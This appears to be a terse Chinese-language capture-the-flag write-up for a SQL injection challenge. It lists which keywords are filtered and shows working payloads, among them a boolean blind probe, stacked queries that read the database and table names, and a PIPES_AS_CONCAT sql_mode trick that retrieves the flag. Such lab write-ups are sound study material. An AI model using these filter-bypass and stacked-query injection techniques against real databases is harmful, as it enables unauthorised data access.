and or && 过滤 但 || 可用 0|| length(database())>2 确定数据库长度为3 可以尝试布尔盲注
sleep 过滤 无法时间盲注
union 过滤 无法联合注入
;无过滤 尝试堆叠注入
1;select database()# --> database():ctf
1;select group_concat(table_name) from information_schama.tables where table_schame=database()#
information_schama from 被过滤
1;show tables# --> table:Flag
sql语句:select $_POST['query'] || flag from 'Flag'(完全猜不出来-_-)
exp: *,1 --> select *,1 || flag from 'Flag'--> select *,1 from 'Flag'
官方wp:1;set sql_mode=PIPES_AS_CONCAT;select 1
关于sql_mode:
https://blog.csdn.net/lky_for_lucky/article/details/110222051?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168766799816800180668703%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168766799816800180668703&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-110222051-null-null.142^v88^insert_down28v1,239^v2^insert_chatgpt&utm_term=sql_mode&spm=1018.2226.3001.4187